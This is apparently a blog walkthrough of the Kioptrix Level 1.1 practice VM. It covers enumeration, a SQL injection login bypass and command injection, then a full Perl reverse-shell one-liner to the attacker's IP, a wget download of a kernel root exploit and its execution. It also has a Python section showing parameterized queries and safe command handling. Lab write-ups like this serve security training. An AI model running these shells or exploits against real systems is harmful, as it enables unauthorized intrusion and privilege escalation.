Kioptrix: Level 1.1 (#2) Walkthrough

Siddhesh Parab
4 min read · May 13, 2020

So, this is the 2nd machine of the Kioptrix series. Kioptrix is a beginner boot2root series. Let's get into it.

Link to the VM image:

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Download the image file and open the virtual image in VMware/VirtualBox.

Enumeration:

So let's find out the IP of the Kioptrix machine. For that we use the command:

netdiscover

The highlighted IP is our Kioptrix machine IP.

Nmap Scan

nmap -sC -sV 192.168.0.105

Port 80:

We visit the webpage hosted on port 80:

http://192.168.0.105:80

We see some kind of login page.

Let's check out the page source code:

ctrl+u

Nothing interesting.

Meanwhile, let's run Gobuster in the background to find hidden directories.

gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Let it run in the background.

As we have found a login page, let's try SQL injection:

Username and password the same.

And boom!! We are in.

I assume that the back-end sql statement was:

SELECT * FROM USERS WHERE username='' AND password=''

EXPLOITATION:

Now let's try command injection. Using the Wappalyzer extension we know that the page is PHP based, so:

And we got the command executed.

This means there is a possibility of RCE (Remote Code Execution) using a reverse shell. Let's check whether bash or python is installed on the victim machine.

;bash --version

We get the output. That means bash is installed on the machine, so we can get a bash reverse shell.
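Both bugs used above come from the same root cause: user input pasted into a string that another interpreter (SQL, then the shell) parses. The following is an added example, not code from the walkthrough or the Kioptrix VM; it uses a constructed in-memory SQLite table and a hypothetical ping handler to show the assumed vulnerable query beside the parameterized fix, and an allow-list plus argv-style execution for the command parameter.

```python
import re
import sqlite3
import subprocess

def make_db():
    # Constructed stand-in for the target's users table (one test account).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('john', 'secret')")
    return db

def login_vulnerable(db, username, password):
    # The pattern the walkthrough assumes: input is spliced into the SQL
    # text, so quote characters in it change the structure of the query.
    query = ("SELECT * FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    return db.execute(query).fetchone() is not None

def login_safe(db, username, password):
    # Parameter binding: values travel separately from the SQL text and can
    # never be parsed as SQL. (Real code also stores a password hash, not
    # the plaintext; omitted to keep the comparison short.)
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None

def compare_logins(username, password):
    # Returns (vulnerable_result, safe_result); "error" means the spliced
    # query was no longer valid SQL, which is the tell-tale of the defect.
    db = make_db()
    try:
        vulnerable = login_vulnerable(db, username, password)
    except sqlite3.OperationalError:
        vulnerable = "error"
    return vulnerable, login_safe(db, username, password)

# Hypothetical hardened ping handler: allow-list the hostname, then pass it
# as its own argv element with shell=False so ';', '|', '&&' carry no meaning.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")

def host_is_allowed(host):
    return HOSTNAME_RE.match(host) is not None

def build_ping_argv(host):
    if not host_is_allowed(host):
        raise ValueError("host rejected by allow-list")
    return ["ping", "-c", "1", host]

def ping_host(host, timeout=5):
    # No shell is involved; the kernel receives the argv list as-is.
    return subprocess.run(build_ping_argv(host), shell=False,
                          capture_output=True, timeout=timeout).returncode
```

A username such as o'brien breaks the vulnerable query outright (the database raises a syntax error), while the parameterized version simply returns no match; the same separation of data from code is what makes the argv-based ping immune to a trailing `;command`.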

For some reason I was not able to get a bash reverse shell, so I tried perl.

;perl -v

We refer to Pentest Monkey for the reverse shell.

In our terminal we use netcat in listening mode so that we can catch the shell:

nc -nlvp 443

In the webpage:
perl -e 'use Socket;$i="192.168.0.104";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

192.168.0.104 is my Kali Linux machine IP.

Hurray!! We got the shell.

We are not the root user.

POST EXPLOITATION:

So now let's escalate our privileges.

Check the kernel version number:

cat /proc/version

Search Google for a kernel exploit. We found one:

https://www.exploit-db.com/exploits/9542

So let's copy the exploit into a file:

gedit exploit.c

Copy and paste the code into the file.

This is an old exploit, so it throws an error when we compile it with the gcc compiler. The -m32 flag was working in my case, so we chose clang, which comes pre-installed in Kali Linux.

clang -o exploit -m32 exploit.c

Now let's place this exploit in our Apache server directory:

mv exploit /var/www/html

Let's start our Apache server:

service apache2 start

Now let's go back to our reverse shell and change to the /tmp directory, since it is the directory that has all the permissions (read, write, execute):

wget 192.168.0.104/exploit
ls
chmod 755 exploit

Now run the exploit:

./exploit

And we are root.

So this was the second machine of the Kioptrix series. Stay tuned for the other machines in this series.